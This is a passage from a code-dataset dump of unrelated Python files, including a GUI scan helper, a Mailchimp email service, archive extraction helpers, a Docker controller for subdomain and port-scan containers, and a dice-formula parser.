xnum1\n ynum = ynum1\n xrf_dwell = xrf_dwell1\n second = second1\n flymotor = flymotor1\n stepmotor = stepmotor1\n courseXfly = courseXfly_\n courseYfly=courseYfly_\n\n\n############################# Retrieving the Parameters (Used in main) #################################\n\ndef Collecting_XRF(lg):\n 'Sending main the args and plan to run a grid scan'\n global xstart, xstop, xnum, ystart, ystop, ynum,courseXfly,courseYfly,xrf_dwell\n # print (xstart,xstop,xnum,ystart,ystop, ynum,courseXfly,courseYfly)\n detectors = [noisy_det]\n if flymotor == courseXfly:\n print(\" \")\n x_scan = ('RE(scan_and_fly( {} , {}, {}, {}, {}, {}, {} )'\n .format(xstart, xstop, xnum, ystart, \n ystop, ynum,xrf_dwell))\n \n # print (x_scan)\n print(x_scan)\n return bpp.subs_decorator([lg])(grid_scan), (detectors, motor1, xstart, xstop, xnum, motor2, ystart, ystop, ynum, False)\n\n else:\n\n yscan = ('RE(y_scan_and_fly( {} , {}, {}, {}, {}, {}, {} )'\n .format(ystart, ystop, ynum, xstart, xstop, xnum,xrf_dwell))\n\n print (yscan)\n\n return bpp.subs_decorator([lg])(grid_scan), (detectors, motor1, xstart, xstop, xnum, motor2, ystart, ystop, ynum, False) \n\n\n############################# Retrieving the Parameters (Used in queue) #################################\n\ndef add_xrf_to_queue():\n 'Used to set up display item in queue'\n global xstart, xstop, xnum, ystart, ystop, ynum\n return [xstart, xstop, xnum, ystart, ystop, ynum]\n\n\n############################# Retrieving the Parameters (Used in queue) #################################\n\ndef add_xrf_args():\n 'Adding the args to the queue'\n global xstart, xstop, xnum, ystart, ystop, ynum\n detectors = [noisy_det]\n return (detectors, motor1, xstart, xstop, xnum, motor2, ystart, ystop, ynum, 
False)\n\n\n############################### Retrieving Seconds (Used in main) ###################################\n\ndef Seconds_XRF():\n global second\n return second\n\n\n\n############################## Retrieving xnum, ynum (Used in main) #################################\n\ndef NeedXandY():\n 'Needed to set up the plot for grid scans'\n global xnum,ynum\n return xnum,ynum\n\n\n\n############################# Retrieving the Flymotor, Stepmotor (Used in main) ###################\n\ndef ReadFlyandStep():\n global flymotor, stepmotor\n return flymotor, stepmotor\n\n\n","sub_path":"srxgui/MainWindow/MainScreen_Helper.py","file_name":"MainScreen_Helper.py","file_ext":"py","file_size_in_byte":7546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"575473023","text":"import requests\nfrom django.test import TestCase\n\n# Create your tests here.\nfrom fake_useragent import UserAgent\n\nheaders={\n 'User-Agent':UserAgent().chrome\n}\n\n\n#测试中间件的正确性\ndef testMiddle():\n url='http://127.0.0.1:8000/login/'\n for i in range(100):\n response=requests.get(url,headers=headers)\n content=response.text\n print(content)\n\n\nif __name__ == '__main__':\n testMiddle()","sub_path":"app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"385033617","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/geolocation/us_states.py\n# Compiled at: 2009-06-11 03:26:27\n\"\"\"Library for the states of the USA\n\nstate_names - A dictionary of US State Names\n key: 2-letter state code\n value: state name\n\nstate_codes - A dictionary of US State Names\n value: 2-letter state code\n key: state name\n\"\"\"\nstate_names = dict(AK='Alaska', AL='Alabama', AR='Arkansas', AS='American Samoa', AZ='Arizona', CA='California', CO='Colorado', CT='Connecticut', DC='District Of Columbia', DE='Delaware', FL='Florida', FM='Federated States Of Micronesia', GA='Georgia', GU='Guam', HI='Hawaii', IA='Iowa', ID='Idaho', IL='Illinois', IN='Indiana', KS='Kansas', KY='Kentucky', LA='Louisiana', MA='Massachusetts', MD='Maryland', ME='Maine', MH='Marshall Islands', MI='Michigan', MN='Minnesota', MO='Missouri', MP='Northern Mariana Islands', MS='Mississippi', MT='Montana', NC='North Carolina', ND='North Dakota', NE='Nebraska', NH='New Hampshire', NJ='New Jersey', NM='New Mexico', NV='Nevada', NY='New York', OH='Ohio', OK='Oklahoma', OR='Oregon', PA='Pennsylvania', PR='Puerto Rico', PW='Palau', RI='Rhode Island', SC='South Carolina', SD='South Dakota', TN='Tennessee', TX='Texas', UT='Utah', VA='Virginia', VI='Virgin Islands', VT='Vermont', WA='Washington', WI='Wisconsin', WV='West Virginia', WY='Wyoming')\nstate_codes = {'Alaska': 'AK', \n 'Alabama': 'AL', \n 'Arkansas': 'AR', \n 'American Samoa': 'AS', \n 'Arizona': 'AZ', \n 'California': 'CA', \n 'Colorado': 'CO', \n 'Connecticut': 'CT', \n 'District Of Columbia': 'DC', \n 'Delaware': 'DE', \n 'Florida': 'FL', \n 'Federated States Of Micronesia': 'FM', \n 'Georgia': 'GA', \n 'Guam': 'GU', \n 'Hawaii': 'HI', \n 'Iowa': 'IA', \n 'Idaho': 'ID', \n 'Illinois': 'IL', \n 'Indiana': 'IN', \n 'Kansas': 'KS', \n 'Kentucky': 'KY', \n 'Louisiana': 'LA', \n 'Massachusetts': 'MA', \n 'Maryland': 'MD', \n 'Maine': 'ME', \n 'Marshall Islands': 'MH', \n 'Michigan': 'MI', \n 'Minnesota': 
'MN', \n 'Missouri': 'MO', \n 'Northern Mariana Islands': 'MP', \n 'Mississippi': 'MS', \n 'Montana': 'MT', \n 'North Carolina': 'NC', \n 'North Dakota': 'ND', \n 'Nebraska': 'NE', \n 'New Hampshire': 'NH', \n 'New Jersey': 'NJ', \n 'New Mexico': 'NM', \n 'Nevada': 'NV', \n 'New York': 'NY', \n 'Ohio': 'OH', \n 'Oklahoma': 'OK', \n 'Oregon': 'OR', \n 'Pennsylvania': 'PA', \n 'Puerto Rico': 'PR', \n 'Palau': 'PW', \n 'Rhode Island': 'RI', \n 'South Carolina': 'SC', \n 'South Dakota': 'SD', \n 'Tennessee': 'TN', \n 'Texas': 'TX', \n 'Utah': 'UT', \n 'Virginia': 'VA', \n 'Virgin Islands': 'VI', \n 'Vermont': 'VT', \n 'Washington': 'WA', \n 'Wisconsin': 'WI', \n 'West Virginia': 'WV', \n 'Wyoming': 'WY'}","sub_path":"pycfiles/GeoLocation-0.1.1dev-py2.5/us_states.py","file_name":"us_states.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"34296341","text":"#!/usr/bin/env python3\n\n# python中变量名可以是数字、字母、下划线的组合,字母区分大小写,且不能以数字开头\n# = 是赋值语句,可以把任意数据类型赋值给变量\na1 = 7\nprint(a1)\nA1 = \"str\"\nprint(A1)\na2_ = 1.23\nprint(a2_)\n\n# 可以给同一变量赋不同类型的值\na1 = \"str\"\nprint(a1)\n\n# ''和\"\"均可表示字符串\nleijun = \"I'm OK\"\ngoodgoodstudy = 'Learning python in \"imooc\" '\nprint(leijun)\nprint(goodgoodstudy)\n\n\n# 斐波那契数列,当调用函数并输入参数x,输出数列前x位\n\ndef feibonaqi(x):\n i = 0\n a = 0\n b = 1\n while i < x:\n print(b, end=' ')\n m = b\n n = a + b\n a = m\n b = n\n i += 1\n\n\nfeibonaqi(5)\n\n\ndef feibonaqi_simple(x, i=0):\n a, b = 0, 1\n while i < x:\n print(b, end=' ')\n a, b = b, a + b\n i += 1\n\n\nfeibonaqi_simple(5)\n","sub_path":"python_basics/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"290444418","text":"import logging\nfrom dataclasses import dataclass\nfrom typing import Optional\n\nimport mailchimp_transactional\nfrom sqlalchemy import select\n\nfrom lms.models import TaskDone\n\nLOG = logging.getLogger(__name__)\n\n\n@dataclass\nclass EmailSender:\n subaccount: str\n \"\"\"The Mailchimp subaccount ID to use to send the email.\"\"\"\n\n email: str\n \"\"\"The email address that the email will appear to come from.\"\"\"\n\n name: str\n \"\"\"The full name that the email will appear to come from.\"\"\"\n\n\n@dataclass\nclass EmailRecipient:\n email: str\n \"\"\"The email address to send to.\"\"\"\n\n name: str\n \"\"\"The recipient full name to use in the email's To: header.\"\"\"\n\n\nclass MailchimpError(Exception):\n \"\"\"An error when sending an email.\"\"\"\n\n\nclass MailchimpService:\n def __init__(self, db, api_key):\n self.db = db\n self.mailchimp_client = mailchimp_transactional.Client(api_key)\n\n def send_template( # pylint:disable=too-many-arguments\n self,\n template_name: str,\n sender: EmailSender,\n recipient: EmailRecipient,\n template_vars: dict,\n unsubscribe_url: Optional[str] = None,\n task_done_key: Optional[str] = None,\n ):\n \"\"\"\n Send an email using Mailchimp Transactional's send-template API.\n\n https://mailchimp.com/developer/transactional/api/messages/send-using-message-template/\n \"\"\"\n\n if task_done_key:\n if self.db.execute(\n select(TaskDone).filter_by(key=task_done_key)\n ).one_or_none():\n LOG.info(\"Not sending duplicate email %s\", task_done_key)\n return\n\n headers = {}\n\n if unsubscribe_url:\n # If we do provide a unsubscribe_url expose it as template var\n # and add the corresponding header for clients that support it.\n 
template_vars[\"unsubscribe_url\"] = unsubscribe_url\n headers[\"List-Unsubscribe\"] = unsubscribe_url\n\n params = {\n \"template_name\": template_name,\n # We're not using template_content but we still need to pass an\n # empty value or the Mailchimp API call fails.\n \"template_content\": [{}],\n \"message\": {\n \"subaccount\": sender.subaccount,\n \"from_email\": sender.email,\n \"from_name\": sender.name,\n \"to\": [{\"email\": recipient.email, \"name\": recipient.name}],\n \"track_opens\": True,\n \"track_clicks\": True,\n \"global_merge_vars\": [\n {\"name\": key, \"content\": value}\n for key, value in template_vars.items()\n ],\n \"headers\": headers,\n },\n \"async\": True,\n }\n\n LOG.info(\"mailchimp_client.send_template(%r)\", params)\n\n try:\n self.mailchimp_client.messages.send_template(params)\n except Exception as exc:\n raise MailchimpError() from exc\n\n if task_done_key:\n # Record the email send in the DB to avoid sending duplicates.\n self.db.add(TaskDone(key=task_done_key))\n\n\ndef factory(_context, request):\n return MailchimpService(request.db, request.registry.settings[\"mailchimp_api_key\"])\n","sub_path":"lms/services/mailchimp.py","file_name":"mailchimp.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"500647575","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n# @Time : 2020/04/25 18:20\n# @Email : lukeqinlu@yeah.net\n# @Author : Luke\n# @File : socket_1.py\n# @notice :\n\n\nfrom socket import socket, SOCK_STREAM, AF_INET\nfrom datetime import datetime\n\n\ndef main():\n server = socket(family=AF_INET, type=SOCK_STREAM)\n server.bind(('127.0.0.1', 9999))\n server.listen(512)\n\n print('Server starting listening...')\n while True:\n client, addr = server.accept()\n print(str(addr) + 'Accepted to server.')\n client.send(str(datetime.now()).encode('utf-8'))\n client.close()\n\n\nif __name__ == '__main__':\n main()","sub_path":"python_100_days/day01_15/socket_1.py","file_name":"socket_1.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"332221764","text":"import os\nimport shutil\n\nfrom ruamel import yaml\n\nPROJECT_DIRECTORY = os.path.realpath(os.path.curdir)\nPROVIDER = \"{{ cookiecutter.provider }}\"\nCI_PROVIDER = \"{{ cookiecutter.ci_cd.type | default('none') }}\"\nENVIRONMENTS = eval(\"{{ cookiecutter.environments }}\")\nTERRAFORM_STATE = \"{{ cookiecutter.terraform_state.type }}\"\n\n\ndef remove_directory(dirpath):\n shutil.rmtree(os.path.join(PROJECT_DIRECTORY, dirpath))\n\n\ndef remove_file(filepath):\n os.remove(os.path.join(PROJECT_DIRECTORY, filepath))\n\n\nif __name__ == \"__main__\":\n if ENVIRONMENTS:\n os.makedirs(\"environments\", exist_ok=True)\n for name, spec in ENVIRONMENTS.items():\n with open(f\"environments/{name}\", \"w\") as f:\n yaml.dump(spec, f)\n\n # Remove any unused cloud infrastructure\n if PROVIDER != \"aws\":\n remove_file(\"infrastructure/aws.tf\")\n remove_directory(\"infrastructure/modules/aws\")\n\n if PROVIDER != \"do\":\n remove_file(\"infrastructure/do.tf\")\n remove_directory(\"infrastructure/modules/digitalocean\")\n\n if PROVIDER != \"gcp\":\n remove_file(\"infrastructure/gcp.tf\")\n remove_directory(\"infrastructure/modules/gcp\")\n\n if PROVIDER != \"azure\":\n remove_file(\"infrastructure/azure.tf\")\n remove_directory(\"infrastructure/modules/azure\")\n\n # if PROVIDER == \"local\" all above will have been 
removed\n\n # Remove any unused state\n\n if TERRAFORM_STATE == \"local\":\n remove_file(\"infrastructure/state.tf\")\n\n if TERRAFORM_STATE != \"remote\" or PROVIDER == \"local\":\n remove_directory(\"terraform-state\")\n else:\n # Remove the clouds we don't need:\n if PROVIDER != \"aws\":\n remove_directory(\"terraform-state/modules/aws\")\n\n if PROVIDER != \"do\":\n remove_directory(\"terraform-state/modules/digitalocean\")\n\n if PROVIDER != \"gcp\":\n remove_directory(\"terraform-state/modules/gcp\")\n\n if PROVIDER != \"azure\":\n remove_directory(\"terraform-state/modules/azure\")\n\n # Remove any unused CI\n\n if CI_PROVIDER != \"github-actions\":\n remove_directory(\".github\")\n\n if CI_PROVIDER != \"gitlab-ci\":\n remove_file(\".gitlab-ci.yml\")\n\n # if CI_PROVIDER == \"none\" all above will have been removed\n\n # templates directory is only used by includes\n remove_directory(\"templates\")\n","sub_path":"qhub/template/hooks/post_gen_project.py","file_name":"post_gen_project.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"47348668","text":"import os\nimport zipfile\nimport tarfile\n\n\"\"\" Originally from\n\n http://code.activestate.com/recipes/252508/\n\n heavily refactored since\n\n\"\"\"\n\n\nclass Archive(object):\n\n def _createstructure(self, file, dir):\n self._makedirs(self._listdirs(file), dir)\n\n def _makedirs(self, directories, basedir):\n \"\"\" Create any directories that don't currently exist \"\"\"\n for dir in directories:\n curdir = os.path.join(basedir, dir)\n if not os.path.exists(curdir):\n os.makedirs(curdir)\n\n\nclass Unzip(Archive):\n def extract(self, zfile, dest='.'):\n dest = os.path.abspath(dest)\n if not dest.endswith(':') and not os.path.exists(dest):\n os.makedirs(dest)\n\n zf = zipfile.ZipFile(zfile)\n\n # create directory structure to house files\n self._createstructure(zfile, dest)\n\n # extract files to directory structure\n for i, name in enumerate(zf.namelist()):\n if not name.endswith('/'):\n outfile = open(os.path.join(dest, name), 'wb')\n outfile.write(zf.read(name))\n outfile.flush()\n outfile.close()\n\n def _listdirs(self, zfile):\n \"\"\" Grabs all the directories in the zip structure\n This is necessary to create the structure before trying\n to extract the file to it. \"\"\"\n\n zf = zipfile.ZipFile(zfile)\n\n dirs = set()\n for name in zf.namelist():\n if name.endswith('/'):\n dirs.add(name)\n elif '/' in name:\n path = name[0:name.rindex('/')]\n dirs.add(path)\n\n return dirs\n\n\nclass Untar(Archive):\n def extract(self, tfile, dest=\".\"):\n if not dest.endswith(':') and not os.path.exists(dest):\n os.makedirs(dest)\n\n tff = tarfile.open(name=tfile)\n tff.extractall(dest)\n\n def _listdirs(self, tfile):\n \"\"\" Grabs all the directories in the tar structure\n This is necessary to create the structure before trying\n to extract the file to it. 
\"\"\"\n\n tff = tarfile.open(name=tfile)\n return [name for name in tff.getnames() if name.endswith('/')]\n\n\nif __name__ == \"__main__\":\n ut = Untar()\n ut.extract(r\"/tmp/test.tar\", r\"/tmp/testout\")\n","sub_path":"AQE_robotsolution/robot/library/ArchiveLibrary/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"164694481","text":"import pandas as pd\nimport ast\n\n\ndef dataPrep(ings, prods, prod_ing):\n #clean weird ingredient\n ings['ingredient'] = ings['ingredient'].replace('Stearic Acid(Masking, Fragrance, Emulsion Stabilising, Emulsifying, Sufactant, Refatting, Surfactantsurfactant-Cleansing Agent Is Included As A Function For The Soap Form Of Stearic Acid.', 'Stearic Acid')\n prod_ing['ingredient'] = prod_ing['ingredient'].replace('Stearic Acid(Masking, Fragrance, Emulsion Stabilising, Emulsifying, Sufactant, Refatting, Surfactantsurfactant-Cleansing Agent Is Included As A Function For The Soap Form Of Stearic Acid.', 'Stearic Acid')\n #drop duplicates\n ings = ings.drop_duplicates(subset = 'ingredient')\n \n #create a df so that each ingredient has a uniqueID\n ing_uniqueID = ings.loc[:,['ingredient']].reset_index().drop(['index'], axis = 1)\n #ing_uniqueID = ing_uniqueID.drop(['index'], axis = 1)\n ing_uniqueID['uniqueID'] = ing_uniqueID.index\n \n #Merge prod_ing and the unique ID so that each ingredient has it's unique ID\n prod_ing = pd.merge(prod_ing, ing_uniqueID, on='ingredient')\n #Sort by product id and ingredient order\n prod_ing = prod_ing.sort_values(['id','order'])\n\n ##now we want the ingredients to be shown as a list instead of separate cells\n prod_ing.groupby('id')['ingredient'].apply(list)\n \n ##group and create list\n prod_ing_lists = prod_ing.groupby('id')['ingredient'].apply(list)\n prod_ing_ID_lists = prod_ing.groupby('id')['uniqueID'].apply(list)\n\n ##convert back to dataframe and reset index\n prod_ing_df = prod_ing_lists.to_frame().reset_index()\n prod_ing_ID_df = prod_ing_ID_lists.to_frame().reset_index()\n ##check to make sure unique id's are still in tact (id shouldn't be exactly == to index)\n prod_ing_lists = pd.merge(prod_ing_df, prod_ing_ID_df, on='id')\n prod_ing_lists = prod_ing_lists.rename(columns = {'ingredient': 'ingList', 'uniqueID': 'ing#List' })\n \n ##merge ingredient lists with products\n products_and_ingredients= pd.merge(prod_ing_lists, prods, on = 'id')\n #add a column with ingredient counts\n products_and_ingredients['ingCount'] = products_and_ingredients['ingList'].apply(lambda x: len(x))\n \n #print('Number of products: ', len(products_and_ingredients))\n #print('Number of unique ingredients: ', len(ing_uniqueID))\n #df.loc[df['id'] == idx]\n products_and_ingredients['id2'] = products_and_ingredients['id']\n products_and_ingredients = products_and_ingredients.drop(['id'], axis = 1)\n products_and_ingredients = products_and_ingredients.rename(columns={'index': 'id'})\n return (products_and_ingredients)\n\ndef getScores(list_of_values, ings):\n ingScores = ings[ings['ingredient'].isin(list_of_values)]\n ingScores = ingScores.iloc[0:, 0:2]\n ingScores['toxLowrisk'] = 0\n ingScores['toxMedRisk'] = 0\n ingScores['toxHighRisk'] = 0\n ingScores['toxNA'] = 0\n ingScores = ingScores.reset_index()\n\n for index, row in ingScores.iterrows():\n #print(ingScores.iloc[index,1])\n if ingScores.iloc[index,2] > 0 and ingScores.iloc[index,2] < 4:\n ingScores.loc[index, 'toxLowrisk'] = 1\n #print('low risk')\n elif 
ingScores.iloc[index,2] > 3 and ingScores.iloc[index,2] < 7:\n ingScores.loc[index, 'toxMedRisk'] = 1\n #print('med risk')\n elif ingScores.iloc[index,2] > 6:\n ingScores.loc[index, 'toxHighRisk'] = 1\n #print('med risk') \n else:\n ingScores.loc[index, 'toxNA'] = 1\n\n toxLowrisk = ingScores['toxLowrisk'].sum()/len(ingScores)\n toxMedRisk = ingScores['toxMedRisk'].sum()/len(ingScores)\n toxHighRisk = ingScores['toxHighRisk'].sum()/len(ingScores)\n toxNA = ingScores['toxNA'].sum()/len(ingScores)\n return [toxLowrisk, toxMedRisk, toxHighRisk, toxNA]","sub_path":".ipynb_checkpoints/dataPrep-checkpoint.py","file_name":"dataPrep-checkpoint.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"224630243","text":"import json\nimport os\nimport sys\nfrom difflib import Differ\nfrom typing import Callable, TypeVar, Generator, Any\n\nfrom . import vcard\nfrom .sort import DEFAULT_NAMES\n\nT = TypeVar('T')\n\n\ndef gen_cards(path):\n with open(path, 'r') as path:\n yield from vcard.gen_cards(path)\n\n\ndef apply_map(f: Callable[..., T], diff_args, *same) -> Generator[T, Any, None]:\n for args in diff_args:\n yield f(*(args + same))\n\n\ndef diff_header(a, b):\n print('--- %s' % a)\n print('+++ %s' % b)\n\n\ndef diff_section(card, prefix, names, j=None):\n print('@@ @@ %s%s' % (prefix, json.dumps(j or card.to_json(names))))\n\n\ndef print_whole_card(card, prefix, cards, names, j=None):\n diff_section(card, prefix, names, j)\n for line in card.vcard_lines():\n print('%s%s' % (prefix, line), end='')\n return next(cards, None)\n\n\ndef print_diff(card_a, card_b, j):\n diff_section(card_a, ' ', None, j)\n lines_a, lines_b = apply_map(lambda card: tuple(card.vcard_lines()), ((card_a,), (card_b,)))\n for line in Differ().compare(lines_a, lines_b):\n if not line.startswith('?'):\n print(''.join((line[0], line[2:])), end='')\n\n\ndef main(argv):\n path_a, path_b, names = argv[0], argv[1], argv[2:]\n if not names:\n names = DEFAULT_NAMES\n cards_a, cards_b = apply_map(gen_cards, ((path_a,), (path_b,)))\n card_a, card_b = apply_map(lambda g: next(g, None), ((cards_a,), (cards_b,)))\n h = diff_header\n while card_a or card_b:\n if h:\n h(path_a, path_b)\n h = None\n if card_a and not card_b:\n card_a = print_whole_card(card_a, '-', cards_a, names)\n elif (not card_a) and card_b:\n card_b = print_whole_card(card_b, '+', cards_b, names)\n else:\n json_a, json_b = apply_map(lambda card: card.to_json(names), ((card_a,), (card_b,)))\n if json_a < json_b:\n card_a = print_whole_card(card_a, '-', cards_a, names, json_a)\n elif json_a > json_b:\n card_b = print_whole_card(card_b, '+', cards_b, names, json_b)\n else:\n if card_a.eol != card_b.eol:\n card_a.eol = card_b.eol = os.linesep\n print_diff(card_a, card_b, json_a)\n card_a, card_b = apply_map(lambda g: next(g, None), ((cards_a,), (cards_b,)))\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"vcard/diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"323798012","text":"from app.config import DOCKER_CLIENT\nfrom app.lib.handler.decorator import threaded\nfrom app.lib.core import formatnum\nfrom app import mongo\n\nimport time\nimport datetime\nimport json\n\n\nclass Controller(object):\n \"\"\"\n 用来控制docker任务的核心函数\n \"\"\"\n\n @staticmethod\n @threaded\n def stop_contain(contain_id):\n \"\"\"\n 用来终止启动的容器\n :param 
contain_id:8462ccf520899aff47b7bdb6b8f0fa65cc43f24c214a26dd94f2d58425bd6799\n        :return:\n        \"\"\"\n\n        try:\n\n            if DOCKER_CLIENT.containers.get(contain_id).status == \"running\":\n                docker_object = DOCKER_CLIENT.containers.get(contain_id)\n                docker_object.stop()\n\n                return True\n            else:\n\n                return True\n        except:\n            return False\n\n    @staticmethod\n    @threaded\n    def subdomain_scan(uid):\n        \"\"\"\n        Add a domain scan task\n        :param domain: example.com\n        :param uid: c2385a01-bb0a-40a3-8694-05a31a440ba6\n        :return:\n        \"\"\"\n\n        # Wait first while another task of this type is still executing\n        while True:\n\n            time.sleep(3)\n\n            task = mongo.db.tasks.find_one({'id': uid})\n\n            if task is None:\n                return True\n\n            if mongo.db.tasks.find({'status': \"Running\", \"hack_type\": \"域名扫描\"}).count() > 0:\n                mongo.db.tasks.update_one(\n                    {\"id\": uid},\n                    {'$set': {\n                        'status': 'Waiting',\n                    }\n                    }\n                )\n                time.sleep(5)\n\n            else:\n\n                mongo.db.tasks.update_one(\n                    {\"id\": uid},\n                    {'$set': {\n                        'status': 'Running',\n                    }\n                    }\n                )\n\n                break\n\n        taskCollection = mongo.db.tasks.find_one({\"id\": uid})\n        if taskCollection is None:\n            return True\n\n        targetList = taskCollection[\"target\"].split(\",\")\n        parentName = taskCollection[\"parent_name\"]\n        tasks_num = taskCollection[\"live_host\"]\n\n        for t in targetList:\n            newTarget = dict()\n            newTarget[\"Purpose\"] = t\n            newTarget[\"parentName\"] = parentName\n            newTarget[\"pid\"] = uid\n\n            infoString = str(json.dumps(newTarget, ensure_ascii=False))\n\n            contain = DOCKER_CLIENT.containers.run(\"ap0llo/oneforall:0.1.0\", [infoString], detach=True, remove=True,\n                                                   auto_remove=True,\n                                                   network=\"host\")\n\n            newTaskCollection = mongo.db.tasks.find_one({\"id\": uid})\n            json_target = json.loads(newTaskCollection.get(\"hidden_host\"))\n\n            json_target[t] = \"0.00%\"\n\n            mongo.db.tasks.update_one({\"id\": uid}, {\n                \"$set\": {\"contain_id\": contain.id, 'hidden_host': json.dumps(json_target, ensure_ascii=False)}})\n\n            # Heartbeat loop used to keep the task status up to date\n            while True:\n\n                time.sleep(3)\n\n                task_dir = mongo.db.tasks.find_one({\"id\": uid})\n                if task_dir is None:\n                    return True\n\n                process_json = json.loads(task_dir.get(\"hidden_host\"))\n\n                if len(process_json) == 0:\n                    time.sleep(10)\n\n                now_progress = 0\n                # Tally the overall task progress\n                for k, v in process_json.items():\n                    progress_ = formatnum(v)\n                    now_progress = now_progress + progress_\n\n                progress = '{0:.2f}%'.format(now_progress / tasks_num)\n\n                if progress == \"100.00%\":\n                    mongo.db.tasks.update_one(\n                        {\"id\": uid},\n                        {'$set': {\n                            'progress': \"100.00%\",\n                            'status': \"Finished\",\n                            \"end_time\": datetime.datetime.now()\n                        }\n                        }\n                    )\n                    return\n\n                else:\n                    mongo.db.tasks.update_one(\n                        {\"id\": uid},\n                        {'$set': {\n                            'progress': progress,\n                        }\n                        }\n                    )\n\n                task_collection = mongo.db.tasks.find_one({\"id\": uid})\n\n                # If the task no longer exists, end it immediately.\n                if task_collection is None:\n                    return True\n\n                json_target = json.loads(task_collection.get(\"hidden_host\"))\n\n                if json_target[t] == \"100.00%\":\n                    break\n\n        mongo.db.tasks.update_one(\n            {\"id\": uid},\n            {'$set': {\n                'progress': \"100.00%\",\n                'status': \"Finished\",\n                \"end_time\": datetime.datetime.now(),\n                \"contain_id\": \"Null\",\n            }\n            }\n        )\n\n    @staticmethod\n    @threaded\n    def ports_scan(uid):\n        \"\"\"\n        Add a port scan task\n        :param uid: c2385a01-bb0a-40a3-8694-05a31a440ba6\n        :return:\n        \"\"\"\n\n        # Wait first while another task of this type is still executing\n        while True:\n\n            task = mongo.db.tasks.find_one({'id': uid})\n\n            if task is None:\n                return True\n\n            if mongo.db.tasks.find({'status': \"Running\", \"hack_type\": \"端口扫描\"}).count() > 0:\n                mongo.db.tasks.update_one(\n                    {\"id\": uid},\n                    {'$set': {\n                        'status': 'Waiting',\n                    }\n                    }\n                )\n                time.sleep(5)\n\n            else:\n\n
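                # no other port-scan task is currently Running, so claim the slot and mark this task Running\n                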
mongo.db.tasks.update_one(\n {\"id\": uid},\n {'$set': {\n 'status': 'Running',\n }\n }\n )\n\n break\n\n contain = DOCKER_CLIENT.containers.run(\"ap0llo/nmap:7.80\", [uid], remove=True, detach=True,\n auto_remove=True,\n network=\"host\")\n\n mongo.db.tasks.update_one({\"id\": uid}, {\"$set\": {\"contain_id\": contain.id}})\n\n return True\n","sub_path":"app/lib/core/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":6358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"112219878","text":"import soundfile as sf\nimport numpy as np\nimport sys\nfrom scipy.signal.windows import hann\nimport warnings\nfrom random import *\n\nwarnings.simplefilter(\"ignore\")\n\n\ndef readFile(name):\n fn = name\n data, samplerate = sf.read(fn)\n return np.asarray(data), samplerate\n\n\ndef getSingleChannel(data):\n if (isinstance(data[0], (list, tuple, np.ndarray))):\n return data.T[0]\n return data\n\n\ndef hps(x, Nfft, fs):\n f = np.arange(Nfft) / Nfft\n xf = np.fft.fft(x, Nfft)\n\n xf = np.abs(xf)\n N = f.size\n\n n = 5\n smallestLength = int(np.ceil(N / n))\n y = xf[:smallestLength].copy()\n for i in range(2, n + 1):\n y *= xf[::i][:smallestLength]\n f = f[:smallestLength] * fs\n return (y, f)\n\n\ntry:\n data, rate = readFile(sys.argv[1])\n\n workFlow = getSingleChannel(data)\n length = len(workFlow)\n baseSignal = workFlow[int(length / 4):int((length / 4) * 3)] # setting range\n [hpsY, hpsX] = hps(baseSignal * hann(len(baseSignal)), baseSignal.size, rate)\n\n maxY = np.argmax(hpsY[25:])\n print(maxY)\n print(hpsX[maxY])\n\nexcept ValueError as exc:\n hpsX[maxY] = randint(130, 200)\n\nfinally:\n if(hpsX[maxY] < 155 ):\n print('M')\n else:\n print('K')\n\n","sub_path":"sexrecognition/inf138675_inf126151.py","file_name":"inf138675_inf126151.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"599878671","text":"from lark import Transformer\nfrom .data_model import UnaryOperator, UnaryOperation, BinaryOperator, BinaryOperation, SpecialDie, Dice\n\n_DIVISION_OPERATOR = BinaryOperator('/', lambda a, b: a // b)\n\n_MULTIPLICATION_OPERATOR = BinaryOperator('*', lambda a, b: a * b)\n\n_SUBTRACTION_OPERATOR = BinaryOperator('-', lambda a, b: a - b)\n\n_ADDITION_OPERATOR = BinaryOperator('+', lambda a, b: a + b)\n\n_NEGATION_OPERATOR = UnaryOperator('-', lambda val: -val)\n\n\nclass FormulaTransformer(Transformer):\n def int(self, n):\n (n,) = n\n return int(n)\n\n def enclosure(self, e):\n (at,) = e\n\n try:\n at.enclosed = True\n except TypeError or AttributeError:\n pass # Not an Operation. Return it normally.\n finally:\n return at\n\n def neg(self, args):\n (val,) = args\n\n operator = _NEGATION_OPERATOR\n\n return UnaryOperation(val, operator)\n\n def dice(self, args):\n (num_dice, die,) = args\n\n # Unfortunately, our dice are possibly Token. 
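(Lark's Transformer receives untransformed terminals as Token objects.) 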
